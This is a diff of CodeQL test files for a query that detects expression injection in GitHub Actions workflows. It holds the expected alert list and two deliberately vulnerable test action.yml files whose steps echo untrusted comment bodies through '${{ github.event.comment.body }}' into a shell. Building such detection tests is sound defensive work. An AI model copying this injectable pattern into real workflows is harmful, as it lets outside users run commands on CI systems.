semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref new file mode 100644 index 000000000000..edaea6fbb219 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml new file mode 100644 index 000000000000..8bfa15b405c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/action1/action.yml @@ -0,0 +1,14 @@ +name: 'test' +description: 'test' +branding: + icon: 'test' + color: 'test' +inputs: + test: + description: test + required: false + default: 'test' +runs: + using: "composite" + steps: + - run: echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/action2/action.yml new file mode 100644 index 000000000000..20f8d227348d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/action2/action.yml @@ -0,0 +1,17 @@ +name: 'Hello World' +description: 'Greet someone and record the time' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + time: # id of output + description: 'The time we greeted you' +runs: + using: 'docker' + steps: # this is actually invalid, used to test we correctly identify composite actions + - run: echo '${{ github.event.comment.body }}' + image: 'Dockerfile' + args: + - ${{ inputs.who-to-greet }} diff --git 